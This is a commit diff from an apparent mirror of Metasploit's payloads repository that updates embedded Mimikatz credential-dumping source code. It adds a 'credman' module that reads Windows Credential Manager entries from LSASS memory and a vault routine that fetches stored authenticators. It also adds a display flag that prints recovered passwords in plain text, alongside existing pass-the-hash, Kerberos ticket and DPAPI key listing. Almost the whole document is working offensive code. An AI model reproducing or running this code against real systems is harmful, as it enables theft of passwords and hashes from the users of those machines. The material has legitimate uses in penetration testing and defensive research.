mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-02-22 03:19:04 +01:00
Update to Mimikatz commit be342ebba59fe9f940a26cbb0e7fab5ee7b6f56b
This commit is contained in:
OJ
parent
8a35e04c7b
commit
2d37f71fd7
@ -14,6 +14,7 @@ PVAULTENUMERATEITEMS VaultEnumerateItems = NULL;
|
||||
PVAULTCLOSEVAULT VaultCloseVault = NULL;
|
||||
PVAULTFREE VaultFree = NULL;
|
||||
|
||||
PVAULTGETITEM7 VaultGetItem7 = NULL;
|
||||
PVAULTGETITEM8 VaultGetItem8 = NULL;
|
||||
|
||||
BOOL isVaultInit = FALSE;
|
||||
@ -70,7 +71,7 @@ NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
|
||||
LPGUID vaults;
|
||||
HANDLE hVault;
|
||||
PVOID items;
|
||||
PVAULT_ITEM_7 items7;
|
||||
PVAULT_ITEM_7 items7, pItem7;
|
||||
PVAULT_ITEM_8 items8, pItem8;
|
||||
NTSTATUS status;
|
||||
|
||||
@ -91,10 +92,34 @@ NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
|
||||
kprintf(L"\tItems (%u)\n", cbItems);
|
||||
for(j = 0; j < cbItems; j++)
|
||||
{
|
||||
if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_MIN_BUILD_8)
|
||||
if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_MIN_BUILD_8) // to fix !
|
||||
{
|
||||
items7 = (PVAULT_ITEM_7) items;
|
||||
// todo
|
||||
kprintf(L"\t %2u.\t%s\n", j, items7[j].FriendlyName);
|
||||
kprintf(L"\t\tType : "); kull_m_string_displayGUID(&items7[j].SchemaId); kprintf(L"\n");
|
||||
kprintf(L"\t\tLastWritten : "); kull_m_string_displayLocalFileTime(&items7[j].LastWritten); kprintf(L"\n");
|
||||
kprintf(L"\t\tFlags : %08x\n", items7[j].Flags);
|
||||
|
||||
kprintf(L"\t\tRessource : "); kuhl_m_vault_list_descItemData(items7[j].Ressource); kprintf(L"\n");
|
||||
kprintf(L"\t\tIdentity : "); kuhl_m_vault_list_descItemData(items7[j].Identity); kprintf(L"\n");
|
||||
kprintf(L"\t\tAuthenticator : "); kuhl_m_vault_list_descItemData(items7[j].Authenticator); kprintf(L"\n");
|
||||
|
||||
for(k = 0; k < items7[j].cbProperties; k++)
|
||||
{
|
||||
kprintf(L"\t\tProperty %2u : ", k); kuhl_m_vault_list_descItemData(items7[j].Properties + k); kprintf(L"\n");
|
||||
}
|
||||
|
||||
pItem7 = NULL;
|
||||
system("pause");
|
||||
status = VaultGetItem7(hVault, &items7[j].SchemaId, items7[j].Ressource, items7[j].Identity, NULL, 0, &pItem7);
|
||||
|
||||
kprintf(L"\t\t*Authenticator* : ");
|
||||
if(status == STATUS_SUCCESS)
|
||||
kuhl_m_vault_list_descItemData(pItem7->Authenticator);
|
||||
else
|
||||
PRINT_ERROR(L"VaultGetItem7 : %08x", status);
|
||||
kprintf(L"\n");
|
||||
;
|
||||
}
|
||||
else
|
||||
{
|
||||
@ -112,7 +137,7 @@ NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
|
||||
|
||||
for(k = 0; k < items8[j].cbProperties; k++)
|
||||
{
|
||||
kprintf(L"\t\tProperty %2u : ", k); kuhl_m_vault_list_descItemData(items8[j].Properties[k]); kprintf(L"\n");
|
||||
kprintf(L"\t\tProperty %2u : ", k); kuhl_m_vault_list_descItemData(items8[j].Properties + k); kprintf(L"\n");
|
||||
}
|
||||
|
||||
pItem8 = NULL;
|
||||
@ -222,18 +247,18 @@ void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(co
|
||||
kprintf(L"\n");
|
||||
}
|
||||
|
||||
if(enumItem8->Properties && (enumItem8->cbProperties > 0) && enumItem8->Properties[0])
|
||||
if(enumItem8->Properties && (enumItem8->cbProperties > 0) && enumItem8->Properties + 0)
|
||||
{
|
||||
switch(pGuidString->guid.Data1)
|
||||
{
|
||||
case 0x0b2e033f5: // pin
|
||||
if(enumItem8->Properties[0]->Type == ElementType_UnsignedShort)
|
||||
kprintf(L"\t\tPIN Code : %04hu\n", enumItem8->Properties[0]->data.UnsignedShort);
|
||||
if((enumItem8->Properties + 0)->Type == ElementType_UnsignedShort)
|
||||
kprintf(L"\t\tPIN Code : %04hu\n", (enumItem8->Properties + 0)->data.UnsignedShort);
|
||||
break;
|
||||
case 0x0b4b8a12b: // picture
|
||||
if(enumItem8->Properties[0]->Type == ElementType_ByteArray)
|
||||
if((enumItem8->Properties + 0)->Type == ElementType_ByteArray)
|
||||
{
|
||||
pElements = (PVAULT_PICTURE_PASSWORD_ELEMENT) enumItem8->Properties[0]->data.ByteArray.Value;
|
||||
pElements = (PVAULT_PICTURE_PASSWORD_ELEMENT) (enumItem8->Properties + 0)->data.ByteArray.Value;
|
||||
if(bgPath)
|
||||
{
|
||||
kprintf(L"\t\tBackground path : %s\n", bgPath);
|
||||
@ -263,9 +288,9 @@ void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(co
|
||||
}
|
||||
break;
|
||||
case 0x0fec87291: // biometric
|
||||
if(enumItem8->Properties[0]->Type == ElementType_ByteArray)
|
||||
if((enumItem8->Properties + 0)->Type == ElementType_ByteArray)
|
||||
{
|
||||
bElements = (PVAULT_BIOMETRIC_ELEMENT) enumItem8->Properties[0]->data.ByteArray.Value;
|
||||
bElements = (PVAULT_BIOMETRIC_ELEMENT) (enumItem8->Properties + 0)->data.ByteArray.Value;
|
||||
bufferStart = (PWCHAR) ((PBYTE) bElements + bElements->headersize);
|
||||
kprintf(L"\t\tProperty : ");
|
||||
if(bElements->domainnameLength > 1)
|
||||
|
||||
@ -139,7 +139,7 @@ typedef struct _VAULT_ITEM_7 {
|
||||
FILETIME LastWritten;
|
||||
DWORD Flags;
|
||||
DWORD cbProperties;
|
||||
PVAULT_ITEM_DATA Properties[ANYSIZE_ARRAY];
|
||||
PVAULT_ITEM_DATA Properties;
|
||||
} VAULT_ITEM_7, *PVAULT_ITEM_7;
|
||||
|
||||
typedef struct _VAULT_ITEM_8 {
|
||||
@ -152,7 +152,7 @@ typedef struct _VAULT_ITEM_8 {
|
||||
FILETIME LastWritten;
|
||||
DWORD Flags;
|
||||
DWORD cbProperties;
|
||||
PVAULT_ITEM_DATA Properties[ANYSIZE_ARRAY];
|
||||
PVAULT_ITEM_DATA Properties;
|
||||
} VAULT_ITEM_8, *PVAULT_ITEM_8;
|
||||
|
||||
typedef struct _VAULT_ITEM_TYPE {
|
||||
@ -173,4 +173,5 @@ typedef NTSTATUS (WINAPI * PVAULTGETINFORMATION) (HANDLE vault, DWORD unk0, PVAU
|
||||
typedef NTSTATUS (WINAPI * PVAULTENUMERATEITEMS) (HANDLE vault, DWORD unk0, PDWORD cbItems, PVOID * items);
|
||||
typedef NTSTATUS (WINAPI * PVAULTENUMERATEITEMTYPES) (HANDLE vault, DWORD unk0, PDWORD cbItemTypes, PVAULT_ITEM_TYPE * itemTypes);
|
||||
|
||||
typedef NTSTATUS (WINAPI * PVAULTGETITEM7) (HANDLE vault, LPGUID SchemaId, PVAULT_ITEM_DATA Resource, PVAULT_ITEM_DATA Identity, HWND hWnd, DWORD Flags, PVAULT_ITEM_7 * pItem);
|
||||
typedef NTSTATUS (WINAPI * PVAULTGETITEM8) (HANDLE vault, LPGUID SchemaId, PVAULT_ITEM_DATA Resource, PVAULT_ITEM_DATA Identity, PVAULT_ITEM_DATA PackageSid, HWND hWnd, DWORD Flags, PVAULT_ITEM_8 * pItem);
|
||||
|
||||
@ -76,10 +76,11 @@ typedef struct _KIWI_BASIC_SECURITY_LOGON_SESSION_DATA {
|
||||
ULONG Session;
|
||||
PVOID pCredentials;
|
||||
PSID pSid;
|
||||
PVOID pCredentialManager;
|
||||
} KIWI_BASIC_SECURITY_LOGON_SESSION_DATA, *PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA;
|
||||
|
||||
typedef void (CALLBACK * PKUHL_M_SEKURLSA_EXTERNAL) (IN CONST PLUID luid, IN CONST PUNICODE_STRING username, IN CONST PUNICODE_STRING domain, IN CONST PUNICODE_STRING password, IN CONST PBYTE lm, IN CONST PBYTE ntlm, IN OUT LPVOID pvData);
|
||||
typedef void (CALLBACK * PKUHL_M_SEKURLSA_ENUM_LOGONDATA) (IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
typedef void (CALLBACK * PKUHL_M_SEKURLSA_ENUM_LOGONDATA) (IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
typedef BOOL (CALLBACK * PKUHL_M_SEKURLSA_ENUM) (IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
typedef struct _KUHL_M_SEKURLSA_PACKAGE {
|
||||
|
||||
@ -22,6 +22,7 @@ const KUHL_M_C kuhl_m_c_sekurlsa[] = {
|
||||
{kuhl_m_sekurlsa_msv_pth, L"pth", L"Pass-the-hash"},
|
||||
{kuhl_m_sekurlsa_kerberos_tickets, L"tickets", L"List Kerberos tickets"},
|
||||
{kuhl_m_sekurlsa_dpapi, L"dpapi", L"List Cached MasterKeys"},
|
||||
{kuhl_m_sekurlsa_credman, L"credman", L"List Credentials Manager"},
|
||||
};
|
||||
|
||||
const KUHL_M kuhl_m_sekurlsa = {
|
||||
@ -37,13 +38,16 @@ const PKUHL_M_SEKURLSA_PACKAGE lsassPackages[] = {
|
||||
&kuhl_m_sekurlsa_kerberos_package,
|
||||
&kuhl_m_sekurlsa_ssp_package,
|
||||
&kuhl_m_sekurlsa_dpapi_svc_package,
|
||||
&kuhl_m_sekurlsa_credman_package,
|
||||
};
|
||||
|
||||
const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
|
||||
{sizeof(KIWI_MSV1_0_LIST_5) , FIELD_OFFSET(KIWI_MSV1_0_LIST_5 , LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_5 , LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_5, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_5 , UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_5 , Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_5 , Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_5 , pSid)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_6) , FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_6, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , pSid)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid)}
|
||||
{sizeof(KIWI_MSV1_0_LIST_51), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_51, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_52), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_60), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_61), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager)},
|
||||
};
|
||||
|
||||
const KUHL_M_SEKURLSA_LOCAL_HELPER lsassLocalHelpers[] = {
|
||||
@ -301,14 +305,18 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
|
||||
sessionData.cLsass = &cLsass;
|
||||
sessionData.lsassLocalHelper = lsassLocalHelper;
|
||||
|
||||
if(cLsass.osContext.MajorVersion < 6)
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_2K3)
|
||||
helper = &lsassEnumHelpers[0];
|
||||
else if(cLsass.osContext.MinorVersion < 2)
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_VISTA)
|
||||
helper = &lsassEnumHelpers[1];
|
||||
else if(cLsass.osContext.MinorVersion < 3)
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_7)
|
||||
helper = &lsassEnumHelpers[2];
|
||||
else
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8)
|
||||
helper = &lsassEnumHelpers[3];
|
||||
if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
|
||||
helper = &lsassEnumHelpers[4];
|
||||
else
|
||||
helper = &lsassEnumHelpers[5];
|
||||
|
||||
securityStruct.hMemory = cLsass.hLsassMem;
|
||||
securityStruct.address = LogonSessionListCount;
|
||||
@ -384,7 +392,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LO
|
||||
if(pLsassData->lsassPackages[i]->Module.isPresent && lsassPackages[i]->isValid)
|
||||
{
|
||||
kprintf(L"\t%s :\t", pLsassData->lsassPackages[i]->Name);
|
||||
pLsassData->lsassPackages[i]->CredsForLUIDFunc(&cLsass, pData->LogonId, pData->pCredentials, pLsassData->externalCallback, pLsassData->externalCallbackData);
|
||||
pLsassData->lsassPackages[i]->CredsForLUIDFunc(pData, pLsassData->externalCallback, pLsassData->externalCallbackData);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
@ -516,9 +524,13 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
, username, domain);
|
||||
|
||||
if(!password || kull_m_string_suspectUnicodeString(password))
|
||||
kprintf(L"%wZ", password);
|
||||
else
|
||||
kull_m_string_wprintf_hex(password->Buffer, password->Length, 1);
|
||||
{
|
||||
if((flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS) && password)
|
||||
kprintf(L"%.*s", password->Length / sizeof(wchar_t), password->Buffer);
|
||||
else
|
||||
kprintf(L"%wZ", password);
|
||||
}
|
||||
else kull_m_string_wprintf_hex(password->Buffer, password->Length, 1);
|
||||
}
|
||||
|
||||
LocalFree(mesCreds->UserName.Buffer);
|
||||
|
||||
@ -24,6 +24,7 @@
|
||||
#include "packages/kuhl_m_sekurlsa_tspkg.h"
|
||||
#include "packages/kuhl_m_sekurlsa_wdigest.h"
|
||||
#include "packages/kuhl_m_sekurlsa_dpapi.h"
|
||||
#include "packages/kuhl_m_sekurlsa_credman.h"
|
||||
|
||||
//#include "kerberos/kuhl_m_kerberos_ticket.h"
|
||||
|
||||
@ -36,6 +37,7 @@
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK 0x07000000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS 0x00400000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE 0x00800000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT 0x10000000
|
||||
@ -70,13 +72,14 @@ NTSTATUS kuhl_m_sekurlsa_minidump(int argc, wchar_t * argv[]);
|
||||
|
||||
typedef struct _KUHL_M_SEKURLSA_ENUM_HELPER {
|
||||
SIZE_T tailleStruct;
|
||||
LONG offsetToLuid;
|
||||
LONG offsetToLogonType;
|
||||
LONG offsetToSession;
|
||||
LONG offsetToUsername;
|
||||
LONG offsetToDomain;
|
||||
LONG offsetToCredentials;
|
||||
LONG offsetToPSid;
|
||||
ULONG offsetToLuid;
|
||||
ULONG offsetToLogonType;
|
||||
ULONG offsetToSession;
|
||||
ULONG offsetToUsername;
|
||||
ULONG offsetToDomain;
|
||||
ULONG offsetToCredentials;
|
||||
ULONG offsetToPSid;
|
||||
ULONG offsetToCredentialManager;
|
||||
} KUHL_M_SEKURLSA_ENUM_HELPER, *PKUHL_M_SEKURLSA_ENUM_HELPER;
|
||||
|
||||
typedef struct _KUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA {
|
||||
|
||||
@ -35,9 +35,9 @@ typedef struct _KIWI_MSV1_0_CREDENTIALS {
|
||||
PKIWI_MSV1_0_PRIMARY_CREDENTIALS PrimaryCredentials;
|
||||
} KIWI_MSV1_0_CREDENTIALS, *PKIWI_MSV1_0_CREDENTIALS;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_5 {
|
||||
struct _KIWI_MSV1_0_LIST_5 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_5 *Blink;
|
||||
typedef struct _KIWI_MSV1_0_LIST_51 {
|
||||
struct _KIWI_MSV1_0_LIST_51 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_51 *Blink;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
@ -49,9 +49,36 @@ typedef struct _KIWI_MSV1_0_LIST_5 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
} KIWI_MSV1_0_LIST_5, *PKIWI_MSV1_0_LIST_5;
|
||||
ULONG unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PVOID unk22;
|
||||
ULONG unk23;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_51, *PKIWI_MSV1_0_LIST_51;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_6 {
|
||||
typedef struct _KIWI_MSV1_0_LIST_52 {
|
||||
struct _KIWI_MSV1_0_LIST_52 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_52 *Blink;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk0;
|
||||
PVOID unk1;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
ULONG unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_52, *PKIWI_MSV1_0_LIST_52;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_60 {
|
||||
struct _KIWI_MSV1_0_LIST_6 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_6 *Blink;
|
||||
PVOID unk0;
|
||||
@ -80,7 +107,49 @@ typedef struct _KIWI_MSV1_0_LIST_6 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
} KIWI_MSV1_0_LIST_6, *PKIWI_MSV1_0_LIST_6;
|
||||
ULONG unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PVOID unk22;
|
||||
ULONG unk23;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_60, *PKIWI_MSV1_0_LIST_60;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_61 {
|
||||
struct _KIWI_MSV1_0_LIST_6 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_6 *Blink;
|
||||
PVOID unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
ULONG unk3;
|
||||
ULONG unk4;
|
||||
ULONG unk5;
|
||||
HANDLE hSemaphore6;
|
||||
PVOID unk7;
|
||||
HANDLE hSemaphore8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
ULONG unk11;
|
||||
ULONG unk12;
|
||||
PVOID unk13;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
LUID SecondaryLocallyUniqueIdentifier;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_61, *PKIWI_MSV1_0_LIST_61;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
struct _KIWI_MSV1_0_LIST_62 *Flink;
|
||||
@ -105,8 +174,7 @@ typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
/*PVOID unk16;
|
||||
PVOID unk17;*/LSA_UNICODE_STRING Type;
|
||||
LSA_UNICODE_STRING Type;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
PVOID unk18;
|
||||
@ -114,6 +182,18 @@ typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
ULONG unk23;
|
||||
ULONG unk24;
|
||||
ULONG unk25;
|
||||
ULONG unk26;
|
||||
PVOID unk27;
|
||||
PVOID unk28;
|
||||
PVOID unk29;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_62, *PKIWI_MSV1_0_LIST_62;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
@ -140,8 +220,7 @@ typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
/*PVOID unk16;
|
||||
PVOID unk17;*/LSA_UNICODE_STRING Type;
|
||||
LSA_UNICODE_STRING Type;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
PVOID unk18;
|
||||
@ -149,4 +228,16 @@ typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
} KIWI_MSV1_0_LIST_63, *PKIWI_MSV1_0_LIST_63;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
ULONG unk23;
|
||||
ULONG unk24;
|
||||
ULONG unk25;
|
||||
ULONG unk26;
|
||||
PVOID unk27;
|
||||
PVOID unk28;
|
||||
PVOID unk29;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_63, *PKIWI_MSV1_0_LIST_63;
|
||||
|
||||
@ -0,0 +1,98 @@
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
http://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : http://creativecommons.org/licenses/by/3.0/fr/
|
||||
*/
|
||||
#include "kuhl_m_sekurlsa_credman.h"
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_single_package[] = {&kuhl_m_sekurlsa_credman_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_credman(int argc, wchar_t * argv[])
|
||||
{
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_credman_single_package, 1, NULL, NULL);
|
||||
}
|
||||
|
||||
const CREDMAN_INFOS credhelper[] = {
|
||||
{
|
||||
sizeof(KIWI_CREDMAN_LIST_ENTRY_5),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_5, Flink),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_5, user),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_5, server2),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_5, cbEncPassword),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_5, encPassword),
|
||||
},
|
||||
{
|
||||
sizeof(KIWI_CREDMAN_LIST_ENTRY_60),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, Flink),
|
||||
